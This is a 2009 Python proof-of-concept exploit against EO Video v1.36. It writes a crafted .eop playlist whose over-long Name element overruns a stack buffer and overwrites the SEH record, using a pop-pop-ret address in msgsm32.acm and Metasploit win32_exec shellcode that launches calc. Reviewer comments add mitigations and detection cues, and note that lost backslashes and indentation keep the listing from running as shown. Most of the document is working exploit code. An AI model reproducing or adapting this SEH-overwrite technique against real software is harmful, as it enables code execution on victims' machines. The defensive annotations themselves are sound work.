# Title : EO Video v1.36 PlayList SEH Overwrite Exploit
# Published : 2009-03-09
# Author : His0k4
#!/usr/bin/python
#usage: exploit.py
# 2009 proof-of-concept against EO Video v1.36: writes a crafted .eop playlist
# in which one over-long element value overruns a stack buffer and reaches the
# thread's SEH registration record when the player parses the file.
# NOTE(review): as rendered on this page the listing is not the author's bytes --
# the "\x" escape sequences have lost their backslashes and the body of the
# try: block has lost its indentation -- so the text below does not run as
# shown. It is kept byte-for-byte here; only comments were added.
# Defender's summary: the weakness is an unbounded copy of playlist element
# text; the mitigations that break this exploit class are SafeSEH on every
# loaded module, DEP and ASLR, and bounds-checking the parser.
# Banner (Python 2 print statements; the "n" in two lines is a mangled "\n").
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploitn"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"
# Filler that pads the element value up to the SEH record; the 1356-byte
# distance is specific to the build/OS named in the banner.
buff = "x41" * 1356
# Overwrites the "next" pointer of the exception registration record.
next_seh = "xEBx06x41x41"
# Overwrites the handler pointer with an address inside msgsm32.acm (per the
# original comment below). NOTE(review): presumably chosen because that module
# is not SafeSEH-compiled -- a module list audit for non-SafeSEH DLLs/ACMs is
# the corresponding hardening check.
seh = "x14x1Ex5Bx58" #pop pop ret msgsm32 .acm
# Hex-encoded playlist markup that precedes the payload. It decodes to the
# <EOPlaylist>/<Playlist>/<FolderList>/<Folder> structure and ends with an
# opened <ProjectElement><Name> element, i.e. the overflow lands in a <Name>
# text value. A file-based detection can key on an .eop whose <Name> content
# is implausibly long or contains non-printable bytes.
header1= (
"x3Cx45x4Fx50x6Cx61x79x6Cx69x73x74x3Ex0Ax3Cx50x6Cx61x79x6C"
"x69x73x74x3Ex0Ax3Cx46x6Fx6Cx64x65x72x4Cx69x73x74x3Ex0Ax3C"
"x46x6Fx6Cx64x65x72x3Ex0Ax3Cx4Ex61x6Dx65x3Ex6Ex65x73x74x6F"
"x3Cx2Fx4Ex61x6Dx65x3Ex0Ax3Cx54x72x75x65x46x72x65x71x75x65"
"x6Ex63x79x3Ex31x3Cx2Fx54x72x75x65x46x72x65x71x75x65x6Ex63"
"x79x3Ex0Ax3Cx2Fx46x6Fx6Cx64x65x72x3Ex0Ax3Cx46x6Fx6Cx64x65"
"x72x3Ex0Ax3Cx4Ex61x6Dx65x3Ex6Ex65x73x74x6Fx3Cx2Fx4Ex61x6D"
"x65x3Ex0Ax3Cx54x72x75x65x46x72x65x71x75x65x6Ex63x79x3Ex31"
"x3Cx2Fx54x72x75x65x46x72x65x71x75x65x6Ex63x79x3Ex0Ax3Cx2F"
"x46x6Fx6Cx64x65x72x3Ex0Ax3Cx2Fx46x6Fx6Cx64x65x72x4Cx69x73"
"x74x3Ex0Ax3Cx50x72x6Fx6Ax65x63x74x45x6Cx65x6Dx65x6Ex74x3E"
"x0Ax3Cx4Ex61x6Dx65x3E")
# Hex-encoded markup that follows the payload: closes </Name>, then
# StartTime/EndTime/MediaSize/State/FolderPositionIndex, </ProjectElement>,
# </Playlist> and </EOPlaylist>, so the file still parses as a playlist.
header2= (
"x3Cx2Fx4Ex61x6Dx65x3Ex0Ax3Cx53x74x61x72x74x54x69x6Dx65x3E"
"x30x3Cx2Fx53x74x61x72x74x54x69x6Dx65x3Ex0Ax3Cx45x6Ex64x54"
"x69x6Dx65x3Ex30x3Cx2Fx45x6Ex64x54x69x6Dx65x3Ex0Ax3Cx4Dx65"
"x64x69x61x53x69x7Ax65x3Ex0Ax3Cx57x69x64x74x68x3Ex2Dx31x3C"
"x2Fx57x69x64x74x68x3Ex0Ax3Cx48x65x69x67x68x74x3Ex2Dx31x3C"
"x2Fx48x65x69x67x68x74x3Ex0Ax3Cx2Fx4Dx65x64x69x61x53x69x7A"
"x65x3Ex0Ax3Cx53x74x61x74x65x3Ex33x30x32x31x36x3Cx2Fx53x74"
"x61x74x65x3Ex0Ax3Cx46x6Fx6Cx64x65x72x50x6Fx73x69x74x69x6F"
"x6Ex49x6Ex64x65x78x3Ex30x3Cx2Fx46x6Fx6Cx64x65x72x50x6Fx73"
"x69x74x69x6Fx6Ex49x6Ex64x65x78x3Ex0Ax3Cx2Fx50x72x6Fx6Ax65"
"x63x74x45x6Cx65x6Dx65x6Ex74x3Ex0Ax3Cx2Fx50x6Cx61x79x6Cx69"
"x73x74x3Ex5Cx6Ex3Cx2Fx45x4Fx50x6Cx61x79x6Cx69x73x74x3E")
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Payload is the benign calc.exe launcher described in the generator comment
# above; from a monitoring standpoint the observable is the media player
# spawning a child process right after opening a playlist.
shellcode = (
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x35"
"x9cxf7xbcx83xebxfcxe2xf4xc9x74xb3xbcx35x9cx7cxf9"
"x09x17x8bxb9x4dx9dx18x37x7ax84x7cxe3x15x9dx1cxf5"
"xbexa8x7cxbdxdbxadx37x25x99x18x37xc8x32x5dx3dxb1"
"x34x5ex1cx48x0exc8xd3xb8x40x79x7cxe3x11x9dx1cxda"
"xbex90xbcx37x6ax80xf6x57xbex80x7cxbdxdex15xabx98"
"x31x5fxc6x7cx51x17xb7x8cxb0x5cx8fxb0xbexdcxfbx37"
"x45x80x5ax37x5dx94x1cxb5xbex1cx47xbcx35x9cx7cxd4"
"x09xc3xc6x4ax55xcax7ex44xb6x5cx8cxecx5dx6cx7dxb8"
"x6axf4x6fx42xbfx92xa0x43xd2xffx96xd0x56x9cxf7xbc"
)
# File layout: markup prefix, filler, SEH record overwrite (next + handler),
# payload, markup suffix.
exploit = header1 + buff + next_seh + seh + shellcode + header2
# Writes the crafted playlist to the current directory. The bare except hides
# the real failure reason (e.g. permission denied) behind a generic message.
try:
out_file = open("exploit.eop",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!nNow Open it :)"
except:
print "Error"